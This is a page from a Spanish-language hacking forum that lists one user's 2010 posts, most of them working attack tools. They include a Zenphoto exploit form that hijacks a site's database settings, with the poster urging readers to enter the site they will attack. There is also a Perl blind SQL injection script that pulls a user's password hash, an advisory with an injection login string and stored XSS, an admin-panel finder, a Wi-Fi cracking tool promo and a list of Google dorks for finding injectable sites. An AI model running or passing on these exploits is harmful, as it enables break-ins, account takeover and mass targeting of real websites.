| |
 Mostrar Temas
|
|
Páginas: 1 [2] 3
|
|
11
|
Seguridad Informática / Nivel Web / MOAUB #26 - Zenphoto Config Update and Command Execute Vulnerability
|
en: 27 Septiembre 2010, 00:33 am
|
Bueno les dejo este otro para utilizarlo solo cambian $path = " http://www.site.com/zenphoto" ."/" . "zp-core/setup.php"; lo que esta dentro de " " y ponen la url de el sitio web que van a atacar! <?php
/*
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/
Abysssec Inc Public Advisory
Title : Zenphoto Config Update and Command Execute Vulnerability
Affected Version : Zenphoto <= 1.3
Discovery : www.abysssec.com
Vendor : http://www.zenphoto.org
*/
$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";
echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>
<body>";
echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
By : Abysssec @ Inc <br>www.Abysssec.com<hr>
<form method='POST' action='$path' >
<input type=hidden name='mysql' value='yes'>
<input type=hidden name='mysql_user' value='$new_mysql_user'>
<input type=hidden name='mysql_pass' value='$new_mysql_pass'>
<input type=hidden name='mysql_host' value='$new_mysql_host'>
<input type=hidden name='mysql_database' value='$new_mysql_database'>
<input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
After click on below , if target will can connect to your Mysql_Host :<br>
You Must view 'GO !' Messege ...<br>
Click on & wait ....
<br> Then , You need to set your admin user and password.<br><hr>
Upload file:<br>
you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
<input type=submit value='Send Your Setting '>
</form>
";
echo "</body></html>";
?>
|
|
|
|
|
13
|
Seguridad Informática / Wireless en Linux / wifite – Mass Wifi WEP/WPA Key Cracking Tool
|
en: 26 Septiembre 2010, 06:12 am
|
 wifite es creado para atacar a varios cifrados WEP y WPA de redes al mismo tiempo. Esta herramienta se puede personalizar para ser automatizada con sólo unos pocos argumentos y se puede confiar para funcionar sin supervisión. Características * Clases por el poder de las metas (en dB); más grietas puntos de acceso primero * Todos los apretones de manos son una copia de seguridad WPA (para wifite.py 's directorio de trabajo) * Opciones de mediados de ataque: parada durante el ataque con Ctrl C para utilizar (continuar, pasar al siguiente objetivo, pase a la ruptura, salida) * Numerosos filtros para especificar exactamente qué ataque (WEP / WPA / tanto, por encima de ciertos puntos fuertes de la señal, canales, etc) * Muy ajustes personalizables (tiempos de espera, los paquetes / seg, etc) * Apoyo SKA (no probado) * Encuentra dispositivos en modo monitor, si no se encuentra ninguno, le pide para la selección * Todas las contraseñas guardadas para log.txt * Conmutación ataques WEP no restablece IVS * Muestra resumen de la sesión en la salida; muestra las claves del agrietado Descarga: wifite |
|
|
|
|
14
|
Seguridad Informática / Nivel Web / E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit
|
en: 26 Septiembre 2010, 06:04 am
|
#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew
# Web Site: www.warwolfz.org
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
$^O eq 'MSWin32' ? system('cls') : system('clear');
print "
E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport |
| Affected versions: 3.1 |
| Bug: Remote Blind SQL Injection (eCal module) |
| Author/s: _mRkZ_, WaRWolFz Crew |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew |
| Web Site: www.warwolfz.org |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
\r\n";
if (@ARGV != 4) {
print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
exit;
}
my $host = $ARGV[0];
my $usr = $ARGV[1];
my $pwd = $ARGV[2];
my $anickde = $ARGV[3];
my $anick = '0x'.EncHex($anickde);
print "[!] Logging In...\r\n";
my %postdata = (
uname => "$usr",
pass => "$pwd",
op => "login"
);
my $cookies = HTTP::Cookies->new(
autosave => 1,
);
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$ua->cookie_jar($cookies);
my $req = (POST $host."/user.php", \%postdata);
my $request = $ua->request($req);
my $content = $request->content;
if ($content =~ /<h4>Benvenuto su/i) {
print "[+] Logged in!\r\n";
} else {
print "[-] Fatal Error: username/password incorrect?\r\n";
exit;
}
print "[!] Checking permissions...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$req = $host."/modules/eCal/location.php?lid=1+AND+1=1";
$ua->cookie_jar($cookies);
$request = $ua->get($req);
$content = $request->content;
if ($content !~ /<b>Eventi nella località: <\/b>/ig) {
print "[+] Fatal Error: Access denied\r\n";
exit;
} else {
print "[+] You have permissions\r\n";
}
print "[!] Exploiting...\r\n";
my $i = 1;
my $pwdchr;
while ($i != 33) {
my $wn = 47;
while (1) {
$wn++;
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
$ua->cookie_jar($cookies);
my $request = $ua->get($req);
my $content = $request->content;
open LOGZZ, '>lol.html';
print LOGZZ $content;
close LOGZZ;
if ($content !~ /<b>Eventi nella località: <\/b><a href='localleve\.php\?lid='>/ig) {
my $cnt = $1;
$pwdchr .= chr($wn);
$^O eq 'MSWin32' ? system('cls') : system('clear');
PrintChars($anickde, $pwdchr);
last;
}
}
$i++;
}
print "\r\n[!] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.org\r\n\r\n";
sub PrintChars {
my $anick1 = $_[0];
my $chars = $_[1];
print "
E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport |
| Affected versions: 3.1 |
| Bug: Remote Blind SQL Injection (eCal module) |
| Author/s: _mRkZ_, WaRWolFz Crew |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew |
| Web Site: www.warwolfz.org |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
[!] Logging In...
[+] Logged in!
[!] Checking permissions...
[+] You have permissions
[!] Exploiting...
[+] ".$anick1."'s md5 Password: ".$chars."
";
}
sub EncHex {
my $char = $_[0];
chomp $char;
my @trans = unpack("H*", "$char");
return $trans[0];
}
#[Unit-X] Vuln-X DB 2010.09.21 |
|
|
|
|
15
|
Seguridad Informática / Nivel Web / MOAUB #25 - VisualSite CMS v1.3 Multiple Vulnerabilities
|
en: 26 Septiembre 2010, 06:04 am
|
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-25-visualsite-cms-multiple-vulnerabilities/
'''
Abysssec Inc Public Advisory
Title : VisualSite CMS Multiple Vulnerabilities
Affected Version : VisualSite 1.3
Discovery : www.abysssec.com
Download Links : http://sourceforge.net/projects/visualsite/
Login Page : http://Example.com/Admin/Default.aspx
Description :
===========================================================================================
This version of Visual Site CMS have Multiple Valnerabilities :
1- Logical Bug for Lock Admin's Login
2- Persistent XSS in admin section
Logical Bug for Lock Admin's Login:
===========================================================================================
If you enter this values in Login Page (http://Example.com/Admin/Default.aspx)
three times during five minutes , the Admin's login will be locked:
Username : 1' or '1'='1
Password : foo
Vulnerable Code is in this file:
../App_Code/VisualSite/DAL.cs
Ln 378:
public static User GetUser(string username)
{
User result = null;
DataTable matches = ExecuteRowset(String.Format("SELECT [ID], [Username], [Password], [LockedDate] FROM [User] WHERE [Username] = '{0}'", Sanitise(username)));
if (matches != null && matches.Rows.Count > 0)
{
...
}
return result;
}
Persistent XSS in admin section:
===========================================================================================
In Edit Section which is accessible to Admin, it is possible to enter a script in Description field
that only executed in the following path and never executed in other situations:
http://Example.com/SearchResults.aspx?q={}
=========================================================================================== |
|
|
|
|
18
|
Programación / Scripting / [Perl]Admin Control Panel Finder V1
|
en: 20 Septiembre 2010, 07:35 am
|
#!/usr/bin/perl
##
# By GlaDiaT0R
# Admin Control Panel Finder ___ Version 1
# Home: Darkgh0st.com
##
use HTTP::Request;
use LWP::UserAgent;
system('cls');
system('title Admin Control Panel Finder v1 final I[C]oded by Gladiator from H4ckCr3w.net');
print"\n";
print "-----------------------------------------------\n" ;
print "[*]--Admin Control Panel Finder v 1 --------[*]\n" ;
print "[*]-------------Coded By GlaDiaT0R----------[*]\n" ;
print "[*]-------------From Darkgh0st.com---------[*]\n" ;
print "[*]------------Greetz to Allah--------------[*]\n" ;
print "*******************************************\n" ;
print "\n";
print "~# enter site to scan\n* ex: www.domaine.com ou www.domaine.com/path\n-> ";
$site=<STDIN>;
chomp $site;
print "\n";
print "~ Enter coding language of the website \n* ex: asp, php, cfm\n-> ";
$code=<STDIN>;
chomp($code);
if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";
print "->Le site: $site\n";
print "->Source du site: $code\n";
print "->Scan de l'admin control panel en cours...\n\n\n";
if($code eq "asp"){
@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
);
foreach $ways(@path1){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Found -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
}
# -------------------------------------------------------
# -------------------test cfm ---------------------------|
# -------------------------------------------------------
if($code eq "cfm"){
@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
);
foreach $ways(@path1){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Found -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
}
# -------------------------------------------------------
#--------------------------/test-------------------------|
# -------------------------------------------------------
if($code eq "php"){
@path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
);
foreach $ways(@path2){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Found -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
kill("STOP",NULL);
}
|
|
|
|
|
19
|
Seguridad Informática / Nivel Web / DVWA – Framework de Entrenamiento en Explotación de Seguridad Web
|
en: 20 Septiembre 2010, 07:33 am
|
[Fuente='Sec-Track'] DVWA (Damn Vulnerable Web Application) es un reconocido entorno de entrenamiento en explotación de seguridad Web, que permite estudiar e investigar sobre las diferentes temáticas involucradas en dicho campo. Ahora se encuentra disponible la versión número 1.0.7, y desde hace algún tiempo se distribuye, además de los archivos , un LiveCD (iso) para facilitar aun más la implementación del entorno de entrenamiento. Entre las mejoras de esta nueva versión, se destaca la página de ayuda del entorno, la implementación de las prácticas de Blind SQL Injection y la documentación oficial del proyecto. Las temáticas cubiertas en el Framework, son las siguientes: Login Brute Force XSS (Cross-Site Scripting) LFI (Local File Inclusion) RFI (Remote File Inclusion) Command Execution Upload Script CSRF (Cross-Site Remote Forgery) SQL Injection Blind SQL Injection Mas info sobre el blogWeb del proyectoDescarga de DVWA(.iso)(480MB) |
|
|
|
|
20
|
Seguridad Informática / Nivel Web / Google Dork para inyecciones SQL
|
en: 20 Septiembre 2010, 07:28 am
|
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id= |
|
|
|
|
|
| |
|
